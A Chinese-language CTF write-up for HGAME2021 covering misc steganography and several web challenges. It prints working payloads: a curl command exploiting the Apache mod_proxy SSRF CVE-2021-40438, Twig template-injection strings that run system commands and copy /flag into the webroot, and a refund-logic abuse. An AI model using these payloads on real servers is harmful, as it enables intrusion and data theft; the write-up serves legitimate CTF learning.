0
点赞
收藏
分享

微信扫一扫

[CTF]HGAME2021 WP

数数扁桃 2022-02-18 阅读 92
python

前言

做了一点就没做了

MISC

群青(其实是幽灵东京)

wav,audicaty看频谱图
在这里插入图片描述
文件属性让我们试试silenteye,解密得到
在这里插入图片描述
访问,下载后文件名提示了SSTV,可以扫出
在这里插入图片描述
hgame{1_c4n_5ee_the_wav}

WEB

Fujiwara Tofu Shop

首先给了在这里插入图片描述
猜到是要加referer头,所以加个头referer: qiumingshan.net
然后
在这里插入图片描述
那么我们知道

User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

这里的意思就是要借助Hachi-Roku才能被服务器识别从而拿到“通行证”(猜的),那么就在User-Agent上改成Hachi-Roku进入下一关
在这里插入图片描述
曲奇暗示cookie,通过bp可以发现
在这里插入图片描述
那么添加一个cookie头flavor=Raspberry即可,然后
在这里插入图片描述
继续看响应
在这里插入图片描述
可以发现多出了一个Gasoline,加一个并且值为100即可
在这里插入图片描述
很明显的XFF,但是
在这里插入图片描述
参考这篇文章
在这里插入图片描述

Tetris plus

看sources,在checkingjs里发现
在这里插入图片描述
这个base64没什么用,主要看下面的jsfuck,复制到控制台运行即可
在这里插入图片描述

蛛蛛…嘿嘿♥我的蛛蛛

写python脚本循环访问即可

import requests
import re
url = 'https://hgame-spider.vidar.club/d1e9f77a0d'
r = requests.get(url).text
res = re.compile('<a href="(\?key=.*?)">')
pl = re.findall(res,r)[0]
while True:
    r = requests.get(url+pl).text
    payload = re.findall(res,r)[0]
    print(url+pl)

flag在最后一个链接的头里面
在这里插入图片描述

webpack-engine

源码泄露
在这里插入图片描述
base64解密两次即可

Apache!

描述:Ooops,Summ3r 的机器被大黑阔打穿了!不过还好 Summ3r 有备份的习惯,把 flag 备份在了内网的某台机器上面,嘿嘿嘿。。。
如题,是个Apache ssrf的洞,CVE-2021-40438,网上找了payload直接打,一直打不出,怎么打都打不出,问了出题人也没怎么理我,然后2.3号晚上心血来潮想再试试,直接就出了。
payload:
curl "http://httpd.summ3r.top:60010/proxy?unix:$(python3 -c 'print("A"*7701, end="")')|http://internal.host/flag"
具体原理网上有文章分析。搜cve即可
在这里插入图片描述

At0m的留言板

一个xss

pokemen

SecurityCenter

题目页面:
在这里插入图片描述

题目提示hint
在这里插入图片描述
可以看到这里使用了twig3
在这里插入图片描述
点击链接显示
在这里插入图片描述
测试一下,存在ssti漏洞
在这里插入图片描述
网上有payload直接打

{{["id"]|map("system")}}

有回显,但是尝试tac /flag的时候发现会提示hacker并且给出过滤规则
在这里插入图片描述
那么其实方法很多,可以cp到/var/www/html下

?url={{[%22cp%20-v%20/flag%20/var/www/html/sapphire.txt%22]|map(%22system%22)}}

然后访问txt即可得到flag

Vidar shop demo

简单注册 然后登陆进去,我们拥有的钱是9999但是题目要10000才能买到flag,先简单的买一个40块钱的,发现还有取消订单的功能,但是要在购买之后,取消后钱是会回来的,那么就有以下思路
先申请一个10000块钱的flag订单,然后通过bp抓之前取消的包,会发现商品的id可以任意更改但是要存在,那么直接通过发包把10000块钱的订单取消,系统就会把10000退给我们
然后直接购买即可得到flag

CRYPTO

REVERSE

easyasm

举报

相关推荐

0 条评论